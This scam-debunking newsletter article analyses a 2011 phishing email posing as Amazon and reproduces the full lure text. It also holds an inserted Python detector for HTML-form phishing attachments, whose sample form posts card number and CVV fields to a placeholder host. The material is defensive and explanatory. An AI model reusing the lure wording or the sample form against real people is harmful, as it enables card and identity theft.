Debunking email hoaxes and exposing Internet scams since 2003!


Issue 118 - September 2011 - Page 2

Amazon Account Review Phishing Scam


Email purporting to be from Amazon claims that, due to a recent review, access to the recipient's account has been limited until more account information is supplied via an attached form.

Brief Analysis
The email is not from Amazon. Instead, it is a phishing scam designed to steal sensitive personal and financial information from Amazon account holders. Information entered on the bogus form contained in the email's attachment will be sent to cybercriminals.

Detailed analysis and references below example.
Last updated: 26th August 2011
First published: 26th August 2011
Article written by Brett M. Christensen

Subject: [] - You have one new message!

We recently reviewed your account, and we need more information about your business to allow us to provide uninterrupted service. Until we can collect this information, your access to sensitive account features will be limited. We would like to restore your access as soon as possible.

This might be due to the following reasons:

1. A recent change in your personal information (ie. change of address, phone number, IP address, email address.)
2. An inability to accurately verify your selected option of payment due to an internal error within our systems.

Please verify your information. To do this we have attached a form to this email. Please download the form and follow the instructions on your screen. NOTE: The form needs to be opened in a modern browser which has JavaScript enabled (ie: Internet Explorer 7+, Firefox 3, Safari 3, Opera 9)

We are requesting this information to verify and protect your identity. This is in order to prevent the illegal activity of accounts. We apologize for any inconvenience this may have caused.


Please do not reply to this email.

Sincerely, Security Team

Detailed Analysis
This message, which purports to be from the UK branch of giant online store Amazon, claims that access to the recipient's Amazon account has been limited. According to the message, the user is required to provide more information due to a recent account review. The message claims that the user can restore account access by filling in a verification form contained in an attached file.

However, the email is not from Amazon. In fact, it is a phishing scam designed to trick people into submitting personal and financial information to Internet criminals. Clicking the attachment opens the following bogus form in the user's web browser:

[Image: Amazon phishing scam fake form]

The bogus form asks for credit card details along with name, address and contact information. The form is designed to resemble a genuine Amazon web page. The scammers deliver the HTML form as an email attachment rather than hosting it as a normal webpage in an attempt to avoid the phishing scam detection systems built into modern web browsers.

If a victim fills in the form and clicks the "Continue" button, all of the requested information can be sent to cybercriminals. Armed with this stolen information, these criminals can then use the victim's credit card for fraudulent transactions and possibly steal his or her identity. They may also onsell the stolen details to other criminals via online black markets.

Once the bogus form has been submitted, victims are automatically redirected to the genuine Amazon website. Thus, they may remain unaware that they have handed their personal details to criminals until fraudulent transactions and other evidence of identity theft subsequently come to their attention.
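A mail-gateway style check for the technique described above, as an added example that is not part of the original article: it flags HTML attachments whose form posts card or identity fields to a remote host. The field-name list, the sample form and the host `collector.example` are constructed assumptions.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Input-name fragments that suggest payment or identity data (assumed list).
SENSITIVE = ("card", "cvv", "expir", "password", "address", "phone")
# Constructed attachment body; collector.example is a placeholder host.
SAMPLE_FORM = ('<form method="post" action="http://collector.example/save.php">'
               '<input name="fullname"><input name="cardnumber"><input name="cvv">'
               '<input type="submit" value="Continue"></form>')

class FormScanner(HTMLParser):
    """Records remote form targets and sensitive input names."""
    def __init__(self):
        super().__init__()
        self.hosts, self.fields = [], []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            url = urlparse(a.get("action") or "")
            if url.scheme in ("http", "https"):  # data leaves the local file
                self.hosts.append(url.hostname)
        elif tag == "input":
            name = (a.get("name") or "").lower()
            if any(s in name for s in SENSITIVE):
                self.fields.append(name)

def scan_message(raw: bytes) -> list:
    """One finding per HTML attachment whose form posts sensitive fields remotely."""
    findings = []
    for part in message_from_bytes(raw, policy=policy.default).iter_attachments():
        fname = part.get_filename() or ""
        if part.get_content_type() != "text/html" and not fname.lower().endswith((".htm", ".html")):
            continue
        body = part.get_content()
        if isinstance(body, bytes):  # attachment sent as application/octet-stream
            body = body.decode("utf-8", "replace")
        s = FormScanner()
        s.feed(body)
        if s.hosts and s.fields:
            findings.append({"file": fname, "posts_to": s.hosts, "fields": s.fields})
    return findings

def build_sample() -> bytes:
    msg = EmailMessage()
    msg.set_content("Please download the form and follow the instructions.")
    msg.add_attachment(SAMPLE_FORM, subtype="html", filename="form.html")
    return msg.as_bytes()
```

Calling `scan_message(build_sample())` returns a single finding naming `form.html`, the remote host and the card fields; a message with no HTML attachment returns an empty list.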

Amazon will never ask customers to provide personal and financial information via an unsolicited email. And the company would certainly never expect customers to provide personal information via an insecure HTML email attachment.

Any unsolicited email that asks you to provide personal or financial information either by following a link to a website or by opening an email attachment should be treated with due caution. No legitimate company or financial institution is ever likely to request private details from customers using such methods.

References
Phishing Scams - Anti-Phishing Information
Identifying Amazon E-mail
